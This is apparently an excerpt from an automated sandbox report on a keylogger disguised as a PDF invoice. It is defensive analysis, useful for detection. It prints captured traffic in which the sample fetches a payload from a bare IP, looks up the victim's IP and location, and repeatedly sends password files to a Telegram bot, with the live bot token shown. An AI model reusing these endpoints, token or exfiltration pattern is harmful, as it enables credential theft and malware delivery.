                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd377099791370Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd379862e661cdHost: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd37b9e640e973Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd37db59945392Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd37f7ca016cffHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3831ced81ec7Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd386942b99070Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd389360758da4Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd38c9a877762dHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3913f002f65bHost: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd395f6e41e0ecHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd39aa76d1b34fHost: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a02fbe2a2f5Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a4b31890c92Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a9ad859f284Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3ae7bc552675Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3b2d0b6cb5ddHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3b7b07ae2ae4Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3bbb3d171aeeHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3c0c82ab07adHost: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3c59fe210fcfHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3ca360ff424eHost: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3cff5f9205eaHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3d400c0e6883Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3d7b19d7036bHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3dce322ca0e4Host: api.telegram.orgContent-Length: 570
                Source: global trafficHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3395b5bc7281Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49816 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49810 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49942 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49930 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49874 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49949 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: GET /STATO/Tllgzvbkww.vdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: 160.22.121.182Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49804 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /STATO/Tllgzvbkww.vdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: 160.22.121.182Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34bb765112f8Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.22.121.182
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.22.121.182/STATO/Tllgzvbkww.vdf
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeString found in binary or memory: http://160.22.121.182/STATO/Tllgzvbkww.vdfUThe
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000290E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000280B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgL
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: InstallUtil.exe, 00000003.00000002.3287740367.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000274E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: InstallUtil.exe, 00000003.00000002.3287740367.000000000274E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: InstallUtil.exe, 00000003.00000002.3287740367.0000000002779000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287740367.00000000027BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
